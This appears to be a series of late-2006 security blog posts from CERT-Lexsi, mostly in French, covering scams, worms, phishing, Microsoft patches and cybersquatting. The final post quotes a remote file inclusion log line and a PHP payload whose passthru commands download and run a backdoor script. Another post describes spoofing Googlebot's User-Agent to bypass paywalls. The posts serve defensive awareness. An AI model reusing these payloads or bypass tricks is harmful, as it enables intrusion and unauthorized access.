Mise à jour :

Le réseau à l'origine de cette arnaque opère visiblement depuis le Bénin. Il utilise notamment une adresse IP appartenant au FAI béninois OMNIUM DES TÉLÉCOMMUNICATIONS ET DE L’INTERNET.

L'hebdomadaire Courrier International est victime d'une usurpation d'identité dans le cadre d'une arnaque de type 419 (aussi appelé scam Nigérian).

A l'adresse www.diplomatic-courier.org se situe un site Web sommaire, permettant de suivre sa "commande". Un fausse page présentant un compte fictif de démonstration ou affilié à une victime a également été créée. Le numéro de la commande pour accéder à cette page est affiché dans le titre de la page http://www.diplomatic-courier.org/track.html !

A noter que la "commande" est datée du 28 novembre alors que le domaine diplomatic-courier.org n'existe que depuis le 17 décembre...

The CERT-Lexsi team members wishes you all the best for 2007!

The District 14 of Alcoholic Anonymous in Springfield, Missouri -or more presumably its hosting provider Lan Artists, had an interesting anti-phishing move. Not only did they quickly take down a phishing site against Paypal hosted on their network. But they also configured a redirection to the ID theft section of the FTC website. By doing so, hosting providers could potentially enlarge the number of targets and victims that file complaints and provide evidences to these anti-phishing bodies and ultimately bring to justice more phishing gangs.

(reported by Steve Pirk on the whitestar.linuxbox.org phishing mailing-list)

Toute l'équipe du CERT-LEXSI vous souhaite de bonnes fêtes !

Quelques jours après la parution de l'article sur FCW, le DoD a répondu en signalant qu'il bloquait désormais tout email en HTML et interdisait temporairement l'accès aux applications de consultation de courriels à distance (Outlook Web Access).

http://www.fcw.com/article97178-12-22-06-Web

Comme l'explique en détail un article sur le site du Federal Computer Week, une maintenance "exceptionnelle" pour le moins curieuse a entraîné de fortes perturbations sur un nouveau réseau informatique affilié au DoD, le département américain de la défense.

Après le Naval War College, un deuxième institut d'enseignement -le National Defense University- a été mis hors ligne pour une durée pouvant atteindre un mois. (Le site www.NDU.edu est à nouveau accessible depuis le 20 décembre).

Une attaque dirigée contre le NDU n'a pas été confirmée par le Ministère, à l'inverse du cas ayant touché le NWC. La maintenance surprend par ailleurs par la longueur de l'indisponibilité; mais le plus surprenant réside peut-être dans les solutions palliatives proposées. En effet, le staff de l'institut et les étudiants pourront travailler depuis leur domicile et leurs adresses emails personnelles.

Meanwhile, staff members at the institution are working from home and using personal e-mail accounts, the employee said.

Tout le monde sait bien que les ordinateurs et comptes email personnels sont mieux sécurisés que les réseaux d'entreprises et qu'aucune compromission, aucune fuite d'informations n'est envisageable par ce biais, en particulier quand ces personnes rapatrieront leurs travaux sur le réseau flambant neuf du NDU.

Le remède pire que le mal ?

Pour un ver, tous les moyens sont bons pour assurer sa réplication. La preuve en est faite avec l'apparition récente d'un ver utilisant Skype, un client multifonctions Tchat/VoIP.

Lorsqu'une machine est compromise, le ver recherche la présence de l'application Skype dans la base de registre Windows et l'exécute si cela n'est pas déjà fait. Il crée ensuite une fenêtre "invisible" servant à utiliser l'application Skype de la manière suivante : Toutes les trois minutes, le vers choisit un contact Skype aléatoirement et lui envoie un message texte contenant une URL ... incroyablement efficace pour télécharger le ver !

Notons que ce nouveau malware n'exploite aucune vulnérabilité et utilise simplement Skype comme vecteur de propagation.

Bref, ne perdons pas les bonnes habitudes en rappelant qu'il ne faut jamais accéder à une ressource "non-sûre" et ne pas cliquer sur des URLs fournies un peu trop généreusement ... même si l'émetteur semble être votre collaborateur !

Il y en a qui n'en ont jamais assez.

Le registraire EuroDNS risque de replonger en effet rapidement dans l'oeil du cyclone, car plusieurs centaines de domaines en .fr ont été déposés ces derniers jours via les services de ce registraire au passé chargé en matière de cybersquatting. Particularité : tous ces domaines utilisent la technique du pointsquatting, à savoir supprimer le point entre "www" et "domaine.fr". Bien évidemment, tous ces enregistrements -qui usurpent de façon délibérée de très nombreuses marques françaises et étrangères (wwwedf.fr, wwwlabanquepostale.fr, wwwmediatis.fr...)- ont été déposés dans un but purement lucratif : générer des profits par détournement de trafic légitime et rémunération de clics.

Les entités impactées pourront éventuellement saisir l'AFNIC, registre en charge de faire appliquer la charte de nommage des domaines. L'AFNIC pourra, si elle le décide, demander des explications au registraire et bloquer les domaines incriminés, comme lors des précédentes affaires de cybersquatting massif impactant les domaines .fr : L. Nunenthal (EuroDNS déjà!), AFX Consulting, KLTE, Guillaume.net...

la société américaine eEye vient de publier une alerte à propos d'un nouveau ver nommé "Big Yellow" et ciblant la vulnérabilité (Ref. Lexsi 7055) des produits Symantec Anti Virus et Client Security.

La vulnérabilité est exploitable uniquement par le biais de l'envoi de paquets malicieux sur le port de l'interface d'administration à distance, soit le port TCP 2967, souvent activé sur les produits Symantec dans le cadre d'une administration d'entreprise (clients et serveurs).

Une fois exécuté, le ver cherche à récupérer un malware à l'emplacement suivant : ftp://[removeme]ftpd.3322.org:21211/NL.eXe, via une connexion FTP nécessitant un login et un mot de passe.

Nous vous conseillons donc de vérifier que le port 2967 est bien filtré au niveau des passerelles, de contrôler l'existence de tentatives d'accès sur le pare-feu ou le Proxy Web vers l'adresse actuelle de téléchargement du malware, et de déployer le correctif fourni par Symantec et disponible depuis le 12 Juin 2006.

***

An alert has just been published by the eEye company about a new worm called "Big Yellow" which is using the Symantec Anti Virus and Client Security vulnerability (Ref. Lexsi 7055).

The vulnerability may be exploited by sending malicious packets to the remote management interface on TCP port 2967, which is typically enabled in enterprise settings (clients and servers).

When executed, the worm try to download a malware from ftp://[removeme]ftpd.3322.org:21211/NL.eXe, using an FTP access protected by a login and password.

We advice to control if the port 2967 is well filtered at gateways, to check firewall or Web proxy logs about access to the current malware URL, and to install the security patch from Symantec, available since 12 June 2006.

Randall Munroe, ancien ingénieur robotique pour la NASA, anime un "webcomic" sur son site << xkcd >>. Il a créé une carte de l'allocation des adresses IP fort originale (avec IPv4) :

Chacun peut se situer sur la carte, et voir ses "voisins" !
xkcd.com est sur le bloc 74, Cert.lexsi.com sur le 62...

Et vous?

Microsoft a publié 7 bulletins de sécurité dont 3 qualifiés de critiques. Les produits impactés sont Windows, Internet Explorer, Visual Studio, Outlook Express et Windows Media. Ces bulletins fournissent des correctifs pour 11 vulnérabilités.
Comme annoncé dans notre billet de pré-notification, Microsoft n'a pas corrigé les 0-days qui circulent sur Office ce mois-ci.

MS06-072 : Microsoft Internet Explorer Multiple Vulnerabilities (Ref. Lexsi 7785),
MS06-073 : Microsoft Visual Studio WMI Object Broker ActiveX Control Code Execution (Ref. Lexsi 7678),
MS06-074 : Microsoft Windows SNMP Memory Corruption Vulnerability (Ref. Lexsi 7890),
MS06-075 : Microsoft Windows File Manifest Corruption Vulnerability (Ref. Lexsi 7889),
MS06-076 : Microsoft Outlook Express Address Book Contact Record Vulnerability (Ref. Lexsi 7888),
MS06-077 : Microsoft Windows Remote Installation Service Code Execution Vulnerability (Ref. Lexsi 7887),
MS06-078 : Microsoft Windows Media Format ASF/ASX Parsing Vulnerability (Ref. Lexsi 7886, 7800).

Les vulnérabilités liées aux bulletins MS06-073 et MS06-078 doivent être traitées en priorité car elles sont actuellement utilisées sur Internet par des attaquants.

Pour les abonnés CSI, vous pouvez retrouver notre alerte détaillée qui est disponible.

En ce jour de correctifs Microsoft, la firme de Redmond a malencontreusement diffusé un correctif Microsoft Office 2004 (pour Mac OS X), qui était seulement en pré-version. Celui ci a été retiré de suite mais dans le cas où il aurait été installé, Microsoft recommande de le désinstaller mais sans en donner la méthodologie.

Après l'annonce d'une première vulnérabilité de type 0-day le 05 Décembre sur Microsoft Word ( Ref. Lexsi 7856), une seconde faille ( Ref. Lexsi 7879) a été identifiée à partir de l'analyse d'un malware nommé PWS-Agent.g et effectuée par l'éditeur antivirus McAfee. De même, le code d'exploitation lié à la vulnérabilité porte le nom Exploit-MSWord.b chez l'éditeur.

Peu d'informations sont disponibles, mais il s'agit d'une vulnérabilité de type dépassement de tampon permettant de faire exécuter du code arbitraire lors de l'ouverture d'un document Word piégé.

Confirmée sur le blog sécurité de Microsoft, l'éditeur de la solution bureautique indique que l'exploitation de cette faille serait très limitée et utilisée contre des cibles restreintes. Cependant, son intégration au sein d'un malware peut laisser craindre que le code d'exploitation soit rapidement analysé et utilisé par d'autres attaquants, à moins que nous ayons réellement à faire à une attaque ciblée d'un particulier ou d'une entreprise basée sur cette souche de malware.

Deux vulnérabilités 0-day dans Word dont l'une au moins est utilisée dans un malware doivent susciter la prudence : Pensez à utiliser une autre application pour consulter les documents non-sûrs, tel OpenOffice par exemple.

Le désormais célèbre site MySpace est devenu un point de convergence incontournable pour des millions d'internautes ... et pas seulement. En effet, certains utilisateurs ont découvert avec stupéfaction que leur compte avait subit quelques modifications.

Le responsable est finalement un vers en Javascript qui s'insère dans les profils utilisateurs. Lorsqu'un profil "infecté" est consulté avec Internet Explorer, une vidéo d'extension ".mov" est téléchargée. Tout ceci ne serait pas extraordinaire si la vidéo en question ne contenait pas un exploit ciblant QuickTime.

L'utilisateur malchanceux voit alors son profil être infecté par le vers. Cerise sur le malware, le menu de navigation du site est remplacé par une copie presque conforme ne pointant plus du tout sur les serveurs de MySpace : Phishing classique mais efficace pour obtenir des identifiants MySpace valides.

Chez MySpace on échange tout : vidéos, musique ... mais gare aux programmes malveillants !

Recently, we have witnessed a notable rise in the number of DDoS attacks launched against various sites from the security community scene, especially those combatting cybercrime.

DDoS technique has been used for a long time to take down hosting providers (EveryDNS, CrystalTech... recently). However, nowadays pirates are getting more and more avengeful by targeting Web portals of security community websites. Castlecops (anti-phishing), SecureScience (security), and some other sites such as MalwareRemoval (helping users infected by the Gromozon malware) have been under attack lately.

On December 5, 2006 Antispam.de, a German group of volunteers that flag spam, phishing and malware, experienced yet another DDoS attack against their camp. The previous ones targeting them took place just a year ago, between December 2005 and January 2006.

Their website is up again since friday evening, but their newsgroup confirmed the DDoS-related stoppage information.

Microsoft vient de publier une pré-notification de la publication des bulletins de sécurité du mois de Décembre sur son blog sécurité : Microsoft Security Response Center Blog. Au menu, cinq bulletins de sécurité pour Windows et un pour Visual Studio. Rien d'extraordinaire donc ...

Ce qui est plus surprenant c'est l'absence d'Office. En effet, cette semaine a vu la divulgation d'une vulnérabilité 0-day sur certaines versions de Word ( Ref. Lexsi 7856). Méfiance donc, car cette vulnérabilité est actuellement exploitée par plusieurs chevaux de Troie.

En attendant les correctifs, il est plus que recommandé de ne pas ouvrir de fichiers Word d'origine inconnue, voire d'utiliser une autre application pour consulter les documents non-sûrs, tel OpenOffice par exemple.

En faisant une recherche sur Google, vous avez peut-être déjà remarqué, que certains résultats étaient listés avec un aperçu de leur contenu, mais que lorsque vous cliquiez dessus, la page vous redirigeait en vous demandant de vous authentifier (parfois même de fournir votre numéro de carte bancaire...). Question : comment Google fait-il ? Le site MainframeGlitch nous apprend une manière de le faire.

De fait, beaucoup de sites demandent une authentification à un utilisateur "normal" mais laissent une porte ouverte afin que les robots de Google puissent quand même indexer le contenu des pages pour apparaitre dans les résultats et ainsi attirer toujours plus de visiteurs (et de revenus par là-même). Parmi ces sites, on retrouve souvent des magasines ou des journaux en ligne.

Il suffit alors de se faire passer par Google afin d'accéder à ces contenus. Pour cela, une simple modification du paramètre "User-Agent" du navigateur permet à celui-ci d'envoyer le même identifiant que les robots de Google lors de la demande de la page au serveur Web. Et le tour est joué... Happy Googling

Historiquement utilisées par les particuliers, un grand nombre d'applications Web prêtes à l'emploi (CMS, Blog, Wiki, etc.) sont désormais mises en oeuvre par les entreprises pour fournir des outils de travail et de publication tant en interne que sur Internet. Ces outils présentent de nombreux avantages sur le plan fonctionnel : facilité de déploiement et d'administration, normalisation des contenus, développements communautaire d'extensions, etc. Cependant, la composante sécurité n'est souvent pas prise en compte à sa juste mesure.

En effet, une vulnérabilité touchant un outil partagé utilisé sur de très nombreux sites Web entraine souvent l'apparition de scripts de piratage, voir de vers, afin d'exploiter la faille de manière automatique sur un maximum de cibles. A contrario, les applications Web "maison" craignent plutôt les attaques ciblées où la motivation du pirate est liée à la nature du propriétaire du site, et non pas à l'existence d'une faille bien documentée.

Les attaques à l'aveugle sur les vulnérabilités souvent corrigées des produits PhpBB, PHP-Nuke, MediaWiki, Mambo, Joomla, Drupal et bien d'autres sont visibles quasi-quotidiennement dans les logs de tout serveur Web, comme dans cet exemple visant la vulnérabilité Ref. Lexsi 7402 :

XXXX.log:84.0.XXX.XXX- - [27/Nov/2006:06:55:53 +0200]@@
"GET /administrator/components/com_comprofiler/plugin.class.php?
mosConfig_absolute_path=http://priv8.[removed].com.ar/i.txt? HTTP/1.1" 200 855 "-" "libwww-perl/5.805"

Le pirate cherche donc ici à faire exécuter le script PHP "i.txt", qui lance par la suite les commandes systèmes suivantes :

<?
passthru('cd /tmp;wget http://[removed].co.uk/jaja.txt;perl jaja.txt;rm -f jaja.txt*');
passthru('cd /tmp;curl -O http://[removed].co.uk/jaja.txt;perl jaja.txt;rm -f jaja.txt*');
passthru('cd /tmp;lwp-download http://[removed].co.uk/jaja.txt;perl jaja.txt.txt;rm -f jaja.txt*');
passthru('cd /tmp;lynx -source http://[removed].co.uk/jaja.txt >jaja.txt;perl jaja.txt;rm -f jaja.txt*');
passthru('cd /tmp;fetch http://[removed].co.uk/jaja.txt >jaja.txt;perl jaja.txt;rm -f jaja.txt*');
passthru('cd /tmp;GET http://[removed].co.uk/jaja.txt >jaja.txt;perl jaja.txt;rm -f jaja.txt*');
?>
... qui vont alors chercher un script Perl contenant toutes les instructions pour l'installation d'une backdoor !

Il est donc nécessaire, avant d'adopter un site Web prêt à l'emploi, de vérifier si les équipes de développements réagissent à l'existence de vulnérabilités (par exemple en publiant des bulletins de sécurité), et de savoir être averti au bon moment pour appliquer rapidement les correctifs nécessaires.